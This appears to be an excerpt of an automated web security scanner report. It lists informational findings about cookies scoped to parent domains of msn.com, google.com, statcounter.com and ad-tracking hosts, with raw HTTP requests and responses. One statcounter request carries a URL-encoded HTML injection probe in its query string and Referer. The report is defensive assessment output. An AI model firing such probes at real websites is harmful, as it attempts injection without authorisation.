Set-Cookie: ActivityInfo=000p81bBo%5f; expires=Tue, 03-May-2011 10:43:37 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Tue, 03-May-2011 10:43:37 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 02 Feb 2011 15:43:37 GMT
Connection: close
Content-Length: 1639

var part0 = '';
part0 += "<"+"!--- start of TRACK_Lendingtree/Retargeting_Homepage_Nonsecure pixel tag --->\n";
part0 += "<"+"IMG SRC=\"http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRAC
...[SNIP]...

11.39. http://businessonmain.msn.com/browseresources/articles/firststeps.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://businessonmain.msn.com
Path:	/browseresources/articles/firststeps.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=85eb2c05b28e495690c312b9224a01fa; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=309A03F95CDC491FB935911E37ED14DA; domain=.msn.com; expires=Sat, 20-Aug-2011 15:30:38 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /browseresources/articles/firststeps.aspx HTTP/1.1
Host: businessonmain.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:30:38 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA55
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=85eb2c05b28e495690c312b9224a01fa; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=309A03F95CDC491FB935911E37ED14DA; domain=.msn.com; expires=Sat, 20-Aug-2011 15:30:38 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 35944

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><noscript><m
...[SNIP]...

11.40. http://businessonmain.msn.com/browseresources/articles/managingemployees.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://businessonmain.msn.com
Path:	/browseresources/articles/managingemployees.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=49639c13297e45b088d53cc2947d18eb; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=BFF6A2643B34482D9EFC461635B43FB3; domain=.msn.com; expires=Sat, 20-Aug-2011 15:30:41 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /browseresources/articles/managingemployees.aspx?cp-documentid=26643311&source=msneditorial&gt1=25049 HTTP/1.1
Host: businessonmain.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.41. http://businessonmain.msn.com/questions/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://businessonmain.msn.com
Path:	/questions/default.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=c5c42e124cd54cec96e54f5910b325c1; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=8088F9A7C2D749B8B22FA419A3CEDF24; domain=.msn.com; expires=Sat, 20-Aug-2011 15:30:34 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /questions/default.aspx HTTP/1.1
Host: businessonmain.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:30:34 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA55
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=c5c42e124cd54cec96e54f5910b325c1; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=8088F9A7C2D749B8B22FA419A3CEDF24; domain=.msn.com; expires=Sat, 20-Aug-2011 15:30:34 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 32370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><noscript><m
...[SNIP]...

11.42. http://businessonmain.msn.com/videos/coolrunnings.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://businessonmain.msn.com
Path:	/videos/coolrunnings.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=c9503258c9294a319d8b55c4818f5954; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=CED44E4F52CF4A00855E3594E951B8B7; domain=.msn.com; expires=Sat, 20-Aug-2011 15:30:33 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /videos/coolrunnings.aspx HTTP/1.1
Host: businessonmain.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:30:33 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA49
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=c9503258c9294a319d8b55c4818f5954; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=CED44E4F52CF4A00855E3594E951B8B7; domain=.msn.com; expires=Sat, 20-Aug-2011 15:30:33 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 70167

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><noscript><m
...[SNIP]...

11.43. http://c.chango.com/collector/tag.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c.chango.com
Path:	/collector/tag.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

_t=1686ac5e-2ee8-11e0-b7c7-00259009a9c2; Domain=chango.com; expires=Sat, 30 Jan 2021 16:18:36 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /collector/tag.js HTTP/1.1
Host: c.chango.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 16:18:36 GMT
Content-Type: text/javascript
Connection: close
Content-Length: 1278
Server: TornadoServer/1.1
Etag: "0cd5cb47552a6946cb3570ced2fb9b2b235cf185"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: _t=1686ac5e-2ee8-11e0-b7c7-00259009a9c2; Domain=chango.com; expires=Sat, 30 Jan 2021 16:18:36 GMT; Path=/
Set-Cookie: _i_admeld=1; Domain=chango.com; expires=Tue, 03 May 2011 16:18:36 GMT; Path=/

(new Image()).src = 'http://tag.admeld.com/match?admeld_adprovider_id=333&external_user_id=' + encodeURIComponent('1686ac5e-2ee8-11e0-b7c7-00259009a9c2');(new Image()).src = 'http://bid.openx.net/cm?p
...[SNIP]...

11.44. http://c.statcounter.com/t.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c.statcounter.com
Path:	/t.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

is_unique=sc609958.1294848674.1-2495334.1296072601.0-1890207.1296398873.0-6453865.1296661235.0; expires=Mon, 01-Feb-2016 15:40:35 GMT; path=/; domain=.statcounter.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t.php?sc_project=6453865&resolution=1920&h=1200&camefrom=http%3A//burp/show/10&u=http%3A//consumershealthyliving.com/clinical-study.html%3F15882%2522%253E%253Ca%253E3a9ae0f5291%3D1&t=Study%3A%20Wrinkles%20Gone!%2090%20Seconds&java=1&security=34ced6a6&sc_random=0.5129681851249188&sc_snum=1&invisible=1 HTTP/1.1
Host: c.statcounter.com
Proxy-Connection: keep-alive
Referer: http://consumershealthyliving.com/clinical-study.html?15882%22%3E%3Ca%3E3a9ae0f5291=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: is_unique=sc609958.1294848674.1-2495334.1296072601.0-1890207.1296398873.0

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:40:35 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
P3P: policyref="http://www.statcounter.com/w3c/p3p.xml", CP="ADMa OUR COM NAV NID DSP NOI COR"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: is_unique=sc609958.1294848674.1-2495334.1296072601.0-1890207.1296398873.0-6453865.1296661235.0; expires=Mon, 01-Feb-2016 15:40:35 GMT; path=/; domain=.statcounter.com
Content-Length: 49
Connection: close
Content-Type: image/gif

GIF89a...................!.......,...........T..;

11.45. http://cdn-sitelife.ehow.com/ver1.0/Direct/DirectProxy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn-sitelife.ehow.com
Path:	/ver1.0/Direct/DirectProxy

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

SiteLifeHost=SJL01WSITEHW12proddmlocal; domain=ehow.com; path=/
BIGipServerEhowSitelife-80=624690954.20480.0000; path=/ ; domain=ehow.com; path=/
anonId=7b713eee-c445-40fd-b53a-2face7f80646; domain=ehow.com; expires=Thu, 02-Feb-2012 16:18:38 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ver1.0/Direct/DirectProxy HTTP/1.1
Host: cdn-sitelife.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: SJL01WSITEHW12proddmlocal
Last-Modified: Wed, 02 Feb 2011 12:55:40 GMT
ETag: -1019203768
Vary: Host
Content-Type: text/javascript; charset=utf-8
Content-Length: 709
Expires: Wed, 02 Feb 2011 16:18:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 02 Feb 2011 16:18:37 GMT
Connection: close
Set-Cookie: SiteLifeHost=SJL01WSITEHW12proddmlocal; domain=ehow.com; path=/
Set-Cookie: BIGipServerEhowSitelife-80=624690954.20480.0000; path=/ ; domain=ehow.com; path=/
Set-Cookie: anonId=7b713eee-c445-40fd-b53a-2face7f80646; domain=ehow.com; expires=Thu, 02-Feb-2012 16:18:38 GMT; path=/

document.write("<script type='text/javascript' src='http://cdn-sitelife.ehow.com/ver1.0/content/direct/scripts/yahoo-min.js'></script>");
document.write("<script type='text/javascript' src='http://cd
...[SNIP]...

11.46. http://code.google.com/apis/maps/terms.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://code.google.com
Path:	/apis/maps/terms.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PREF=ID=12173e7013f292ae:TM=1296574272:LM=1296574272:S=z4KWxo5IiJLGfo2s; expires=Thu, 31-Jan-2013 15:31:12 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /apis/maps/terms.html HTTP/1.1
Host: code.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Vary: Accept-Language,Cookie,Referer
Content-Type: text/html; charset=UTF-8
ETag: "5b1f8d1d1f3fe8e8a5f6a42403166dd0"
Last-Modified: Tue, 01 Feb 2011 15:31:12 GMT
Date: Tue, 01 Feb 2011 15:31:12 GMT
Expires: Tue, 01 Feb 2011 15:31:12 GMT
Cache-Control: private, max-age=3600
X-Content-Type-Options: nosniff
Set-Cookie: PREF=ID=12173e7013f292ae:TM=1296574272:LM=1296574272:S=z4KWxo5IiJLGfo2s; expires=Thu, 31-Jan-2013 15:31:12 GMT; path=/; domain=.google.com
Server: codesite_static_content
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>

<meta http-equiv="content-type" cont
...[SNIP]...

11.47. http://code.google.com/p/swfobject/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://code.google.com
Path:	/p/swfobject/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PREF=ID=67f4248f6f4e927e:TM=1296663519:LM=1296663519:S=3qkYaXXnuUHAF5bU; expires=Fri, 01-Feb-2013 16:18:39 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p/swfobject/ HTTP/1.1
Host: code.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.48. http://code.google.com/p/swfobject/wiki/documentation previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://code.google.com
Path:	/p/swfobject/wiki/documentation

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PREF=ID=febcf9fa8da9b901:TM=1296663519:LM=1296663519:S=5-AUrgWhoWp7Jc89; expires=Fri, 01-Feb-2013 16:18:39 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p/swfobject/wiki/documentation HTTP/1.1
Host: code.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.49. https://content.atomz.com/static/scode/H.15.1/snpall/s_code.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://content.atomz.com
Path:	/static/scode/H.15.1/snpall/s_code.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1stsp=E67B5206FBADB2C7; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.atomz.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /static/scode/H.15.1/snpall/s_code.js HTTP/1.1
Host: content.atomz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.50. http://cookex.amp.yahoo.com/v2/cexposer/SIG=13r09h5ct/*http:/ad.yieldmanager.com/imp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cookex.amp.yahoo.com
Path:	*/v2/cexposer/SIG=13r09h5ct/http:/ad.yieldmanager.com/imp**

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

B=4dl1ead6kjbgp&b=3&s=ii; expires=Tue, 02-Feb-2013 20:00:00 GMT; path=/; domain=.yahoo.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /v2/cexposer/SIG=13r09h5ct/*http:/ad.yieldmanager.com/imp HTTP/1.1
Host: cookex.amp.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:18:49 GMT
Set-Cookie: B=4dl1ead6kjbgp&b=3&s=ii; expires=Tue, 02-Feb-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8
Cache-Control: private
Content-Length: 0

11.51. http://cspix.media6degrees.com/orbserv/hbpix previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cspix.media6degrees.com
Path:	/orbserv/hbpix

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

acs=015020a0e0f0g1lebnnsxzt11o9ctxzt11o9ctxzt11kzqpxzt11o9ct; Domain=media6degrees.com; Expires=Mon, 01-Aug-2011 15:14:45 GMT; Path=/
adh=1lf17qo160226030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000; Domain=media6degrees.com; Expires=Mon, 01-Aug-2011 15:14:45 GMT; Path=/
clid=2lebnns011706ch47d7o8wtv1o9ct00u0x010602201; Domain=media6degrees.com; Expires=Mon, 01-Aug-2011 15:14:45 GMT; Path=/
ipinfo=2lfzx0l0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; Domain=media6degrees.com; Expires=Mon, 01-Aug-2011 15:14:45 GMT; Path=/
orblb=2lfk1rn012dh10u0100000; Domain=media6degrees.com; Expires=Mon, 01-Aug-2011 15:14:45 GMT; Path=/
rdrlst=40x07dpletz4d0000000q0x010o2ylebnns0000000u0x010mmnlebnns0000000u0x010xo1lebnns0000000u0x010x1blebnns0000000u0x010eh5lf17qf0000000m0x0106bylemlne0000000s0x010w3clebnns0000000u0x0107gmlebnns0000000u0x010jv6lebnns0000000u0x010j4ilew2e20000000o0x010xthlebnns0000000u0x010fullf8gij0000000i0x011196lfzx0l000000010x0100c9lfk1rn0000000f0x010jillebnns0000000u0x010fuqlegh2b0000000t0x010b6mlf17qk0000000l0x010mz1lebnns0000000u0x010cajlfk1rn0000000f0x010p7vlebnns0000000u0x0107vglfk1rn0000000f0x010xvslebnns0000000u0x010xuklebnns0000000u0x010x1jlebnns0000000u0x010jk7lebnns0000000u0x010cbnlfk1rn0000000f0x010yiplebnns0000000u0x010yh0lebnns0000000u0x010xwflebnns0000000u0x010e4vlebnns0000000u0x010jwblfk1rn0000000f0x010xwblebnns0000000u0x01; Domain=media6degrees.com; Expires=Mon, 01-Aug-2011 15:14:45 GMT; Path=/
sglst=2140s8dtletz4d0pqa500a0l000400100a70lebnns181qq00e0l00040010061gletz4d0pqa500a0l0004001005b0lf17qo0000000k0x010602201ag2leqh1919fzc00r0x01060220182gletz4d0pqa500a0l0004001009zdlebnns181qq00e0l00040010082hlebnns1o9ct00u0x0106022015q7letz4d0pqa500a0l000400100a6slebnns181qq00e0l000400100achlebnns181qq00e0l0004001007x9lebnns181qq00e0l000400100b1alfjpei0g7m300g0x010602201820lebnns181qq00e0l000400100b0olfjpei0g7m300g0x010602201ab4lebnns1o9ct00u0x0106022019szlebnns1o9ct00u0x0106022018wklebnns181qq00e0l000400100923lebnns181qq00e0l000400100ahllebnns181qq00e0l0004001000tllegh2b1jfya00t0x010602201al1letz4d0pqa500a0l0004001008lllebnns181qq00e0l000400100abulebnns181qq00e0l0004001005q8lebnns1o9ct00f0x0106012017y2lebnns181qq00e0l0004001008bgletz4d0pqa500a0l000400100b0clfjpei0g7m300g0x010602201b08lfjpei0g7m300g0x01060220140slebnns181qq00e0l00040010045mlfdxmc0000000h0x010602201a97lebnns181qq00e0l000400100ah4lebnns181qq00e0l0004001003s4letz4d0pqa500a0l00040010040uletz4d0pqa500a0l000400100acdlebnns181qq00e0l000400100aanlebnns181qq00e0l0004001009atlebnns181qq00e0l00040010086zlebnns181qq00e0l000400100ac3letz4d0pqa500a0l000400100; Domain=media6degrees.com; Expires=Mon, 01-Aug-2011 15:14:45 GMT; Path=/
vstcnt=3lebnns031l034e206123s181qq1845a1847x1845b1847u1847e1847k1847y1843w1844k184621845j1844p184551843s1847h1846q1844z184871846u184571843u18486184741846t1846l1845r1842z185k81848f1844n1844d184781846a1845v1846j1846k184801845s1843g1847a1843d184841846r1845y1844l1847i1847r1847p184541843r1845i1844y1844r1842x184811846o1844u1844s1847b1843k1843n1848a1845q1845n1845c1842t1844j1845e1845g184821846p184301847f1844c1847t1843c1843j1848b1847z1842u1843p184851846s1845f1845h18435184371846b1843o1845m1847s1848g1844g184561843t1847c1847g1843f1844a1847v1843m1844m184721845p1848e1844q1848c1843h1842y1847d1848d1844t1845x1847q1845k184711845o1846i1844f184791845w1845d184581844h1843v1847o18434184691845t184531844w1844e184881846v1844v4fhux122s000000axzm000000d1t30d1rq0d1qh0d1te000000d1ss0d1px0d1s00d1t20d1sn0d1rp0d1rb0d1t40d1rr0d1s70d1qu0d1q60d1ps0d1r70d1pu0d1rf0d1r10d1r40d1qx0d1ql0d1pr0d1r60d1sm0d1r90d1pw0d1qw0d1qc0d1sr0d1qz0d1sq0d1se0d1rm0d1qj0d1rg0d1t90d1rw0d1pl0d1qe0d1q50d1rc0d1q20d1so0d1t00d1ro0d1su0d1sd0d1qa0d1tb0d1qv0d1s10d1qo0d1r00d1s40d1qi0d1t80d1tf0d1st0d1py0d1rh0d1rd0d1sz0d1qm0d1q40d1q10d1r80d1pv0d1rk0d1s20d1sk0d1tc0d1rj0d1qb0d1pm0d1r20d1sc0d1rl0d1qg0d1ta0d1rt0d1t50d1rs0d1r30d1pq0d1si0d1t70d1sj0d1ru00000000000000000000000004esx7120104tej0r023ik5120o0keqa0pk2n0kh4a0kh3u0kh490kh3s0kh3t0kh3m0kh3a0kh3y0kh3j0kh3h0kh390kh3x0kh3v0kh4b0kh3d0kh3f0kh3r0kh3l0kh430kh3g0kh3p0kh3z4nssk122m1boph1c4wn1bw2l1bw321bw2o1bw501bw3n1bw4o1bw3c1bw301bw5f1bw4e1bw381bw3l1bw2m1bw2c1bw351bw481bw2v1bw4h1bw4x1bw4b1bw361bw3z1bw4f1bw4w1bw4g1bw331bw431bw2q1bw4z1bw2b1bw441bw2r1bw5e1bw3f1bw521bw3p1bw5a1bw311bw4r1bw5d1bw5j1bw421bw2p1bw3x1bw5g1bw2i1bw4a1bw3b1bw531bw4p1bw3q1bw541bw3r1bw4q1bw4j1bw461bw2t1bw3m1bw4y1bw4s1bw2z1bw4c1bw2k1bw3v1bw4i1bw4t1bw3a1bw451bw2s1bw2j1bw4n1bw3e1bw591bw3w1bw401bw2n1bw3u1bw341bw4u1bw3k1bw491bw2w1bw5b1bw561bw3t1bw511bw551bw3s1bw471bw2u1bw5i1bw4l1o018EstvP2qn11011o9ct; Domain=media6degrees.com; Expires=Mon, 01-Aug-2011 15:14:45 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4d1ec56b7612a62c&curl=http%3a%2f%2fwww.ehow.com%2fcomputer-software%2f HTTP/1.1
Host: cspix.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh30.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lf8gij0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=015020a0e0f0g1lebnnsxzt1181qqxzt11kzqpxzt11kzqpxzt1181qq; adh=1lf17qo160226030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000; clid=2lebnns011706ch47d7o8wtv1kzqp00t0v01060110s; orblb=2lfk1rn012dh10u0100000; rdrlst=2100so2ylebnns0000000t0v01060110s7dpletz4d0000000p0v01060110p10flfk1rn0000000e0v01060110emmnlebnns0000000t0v01060110s10elfk1rn0000000e0v01060110e10rlfwneh000000010v010601101x1blebnns0000000t0v01060110sxo1lebnns0000000t0v01060110seh5lf17qf0000000l0v01060110l6bylemlne0000000r0v01060110rw3clebnns0000000t0v01060110s7gmlebnns0000000t0v01060110sjv6lebnns0000000t0v01060110sj4ilew2e20000000n0v01060110nxthlebnns0000000t0v01060110sfullf8gij0000000h0v01060110h0c9lfk1rn0000000e0v01060110ejillebnns0000000t0v01060110sfuqlegh2b0000000s0v01060110sb6mlf17qk0000000k0v01060110kmz1lebnns0000000t0v01060110scajlfk1rn0000000e0v01060110ep7vlebnns0000000t0v01060110s7vglfk1rn0000000e0v01060110exvslebnns0000000t0v01060110s10rlfjpei0000000f0v01060110fxuklebnns0000000t0v01060110sjk7lebnns0000000t0v01060110sx1jlebnns0000000t0v01060110syiplebnns0000000t0v01060110scbnlfk1rn0000000e0v01060110exwflebnns0000000t0v01060110syh0lebnns0000000t0v01060110se4vlebnns0000000t0v01060110sxwblebnns0000000t0v01060110sjwblfk1rn0000000e0v01060110e; sglst=2140s8dtletz4d0pqa500a0l00040010061gletz4d0pqa500a0l000400100a70lebnns181qq00e0l0004001005b0lf17qo0000000j0v01060110j82gletz4d0pqa500a0l000400100ag2leqh19166d800q0v01060110q82hlebnns181qq00t0v01060110s9zdlebnns181qq00e0l0004001005q7letz4d0pqa500a0l000400100a6slebnns181qq00e0l000400100achlebnns181qq00e0l0004001007x9lebnns181qq00e0l000400100b1alfjpei0000000f0v01060110f820lebnns181qq00e0l000400100b0olfjpei0000000f0v01060110fab4lebnns181qq00t0v01060110s9szlebnns181qq00t0v01060110s8wklebnns181qq00e0l000400100923lebnns181qq00e0l000400100ahllebnns181qq00e0l0004001000tllegh2b1g6c600s0v01060110sal1letz4d0pqa500a0l0004001008lllebnns181qq00e0l000400100abulebnns181qq00e0l000400100b0clfjpei0000000f0v01060110f8bgletz4d0pqa500a0l0004001007y2lebnns181qq00e0l0004001005q8lebnns181qq00e0l000400100b08lfjpei0000000f0v01060110f40slebnns181qq00e0l0004001003s4letz4d0pqa500a0l000400100ah4lebnns181qq00e0l000400100a97lebnns181qq00e0l00040010045mlfdxmc0000000g0v01060110g40uletz4d0pqa500a0l000400100acdlebnns181qq00e0l000400100aanlebnns181qq00e0l0004001009atlebnns181qq00e0l00040010086zlebnns181qq00e0l000400100ac3letz4d0pqa500a0l000400100; vstcnt=3lebnns020r024nssk122m1boph1c4wn1bw2l1bw321bw2o1bw501bw3n1bw4o1bw3c1bw301bw5f1bw4e1bw381bw3l1bw2m1bw2c1bw351bw481bw2v1bw4h1bw4x1bw4b1bw361bw3z1bw4f1bw4w1bw4g1bw331bw431bw2q1bw4z1bw2b1bw441bw2r1bw5e1bw3f1bw521bw3p1bw5a1bw311bw4r1bw5d1bw5j1bw421bw2p1bw3x1bw5g1bw2i1bw4a1bw3b1bw531bw4p1bw3q1bw541bw3r1bw4q1bw4j1bw461bw2t1bw3m1bw4y1bw4s1bw2z1bw4c1bw2k1bw3v1bw4i1bw4t1bw3a1bw451bw2s1bw2j1bw4n1bw3e1bw591bw3w1bw401bw2n1bw3u1bw341bw4u1bw3k1bw491bw2w1bw5b1bw561bw3t1bw511bw551bw3s1bw471bw2u1bw5i1bw4l3ik5120o0keqa0pk2n0kh4a0kh3u0kh490kh3s0kh3t0kh3m0kh3a0kh3y0kh3j0kh3h0kh390kh3x0kh3v0kh4b0kh3d0kh3f0kh3r0kh3l0kh430kh3g0kh3p0kh3z1l034e206123s181qq1845a1847x1845b1847u1847e1847k1847y1843w1844k184621845j1844p184551843s1847h1846q1844z184871846u184571843u18486184741846t1846l1845r1842z185k81848f1844n1844d184781846a1845v1846j1846k184801845s1843g1847a1843d184841846r1845y1844l1847i1847r1847p184541843r1845i1844y1844r1842x184811846o1844u1844s1847b1843k1843n1848a1845q1845n1845c1842t1844j1845e1845g184821846p184301847f1844c1847t1843c1843j1848b1847z1842u1843p184851846s1845f1845h18435184371846b1843o1845m1847s1848g1844g184561843t1847c1847g1843f1844a1847v1843m1844m184721845p1848e1844q1848c1843h1842y1847d1848d1844t1845x1847q1845k184711845o1846i1844f184791845w1845d184581844h1843v1847o